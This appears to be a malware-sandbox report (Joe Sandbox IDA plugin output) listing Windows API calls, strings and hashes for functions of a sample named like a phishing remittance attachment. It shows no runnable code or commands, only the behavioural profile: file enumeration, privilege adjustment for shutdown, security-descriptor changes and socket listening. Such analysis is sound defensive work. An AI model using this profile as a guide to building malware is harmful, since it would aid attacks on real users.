                                                                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                      • __swprintf.LIBCMT ref: 00478AA7
                                                                      • __swprintf.LIBCMT ref: 00478AD5
                                                                      • __swprintf.LIBCMT ref: 00478B03
                                                                      Strings
                                                                      Memory Dump Source
                                                                       • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                      • API String ID: 999945258-2428617273
                                                                      • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                      • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                      • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                      • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                      APIs
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                      • __wsplitpath.LIBCMT ref: 00403492
                                                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                      • _wcscpy.LIBCMT ref: 004034A7
                                                                      • _wcscat.LIBCMT ref: 004034BC
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                      • _wcscpy.LIBCMT ref: 004035A0
                                                                      • _wcslen.LIBCMT ref: 00403623
                                                                      • _wcslen.LIBCMT ref: 0040367D
                                                                      Strings
                                                                      • Unterminated string, xrefs: 00428348
                                                                      • Error opening the file, xrefs: 00428231
                                                                      • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                      • _, xrefs: 0040371C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                      • API String ID: 3393021363-188983378
                                                                      • Opcode ID: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                                                                      • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                      • Opcode Fuzzy Hash: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                                                                      • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                      • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                      • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                      • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                      • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                      • String ID: *.*
                                                                      • API String ID: 1409584000-438819550
                                                                      • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                      • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                      • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                      • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                      • __swprintf.LIBCMT ref: 00431C2E
                                                                      • _wcslen.LIBCMT ref: 00431C3A
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                      • String ID: :$\$\??\%s
                                                                      • API String ID: 2192556992-3457252023
                                                                      • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                      • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                      • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                      • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                      APIs
                                                                      • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                      • __swprintf.LIBCMT ref: 004722B9
                                                                      • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                      • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                      • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                      • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                      • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                      • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                      • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                      • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                      • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: FolderPath$LocalTime__swprintf
                                                                      • String ID: %.3d
                                                                      • API String ID: 3337348382-986655627
                                                                      • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                      • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                      • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                      • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                      • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                      • FindClose.KERNEL32(00000000), ref: 00442930
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                      • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                        • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                      • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                      • String ID: *.*
                                                                      • API String ID: 2640511053-438819550
                                                                      • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                      • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                      • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                      • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                      • GetLastError.KERNEL32 ref: 00433414
                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                      • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                      • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                      • String ID: SeShutdownPrivilege
                                                                      • API String ID: 2938487562-3733053543
                                                                      • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                      • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                      • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                      • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                      APIs
                                                                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                        • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                        • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                      • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                      • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 1255039815-0
                                                                      • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                      • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                      • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                      • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                      APIs
                                                                      • __swprintf.LIBCMT ref: 00433073
                                                                      • __swprintf.LIBCMT ref: 00433085
                                                                      • __wcsicoll.LIBCMT ref: 00433092
                                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                      • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                      • LockResource.KERNEL32(?), ref: 00433120
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                      • String ID:
                                                                      • API String ID: 1158019794-0
                                                                      • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                      • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                      • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                      • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                      • String ID:
                                                                      • API String ID: 1737998785-0
                                                                      • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                      • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                      • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                      • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                      • GetLastError.KERNEL32 ref: 0045D6BF
                                                                      • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                      • API String ID: 4194297153-14809454
                                                                      • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                      • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                      • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                      • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$_strncmp
                                                                      • String ID: @oH$\$^$h
                                                                      • API String ID: 2175499884-3701065813
                                                                      • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                      • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                      • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                      • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                      • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
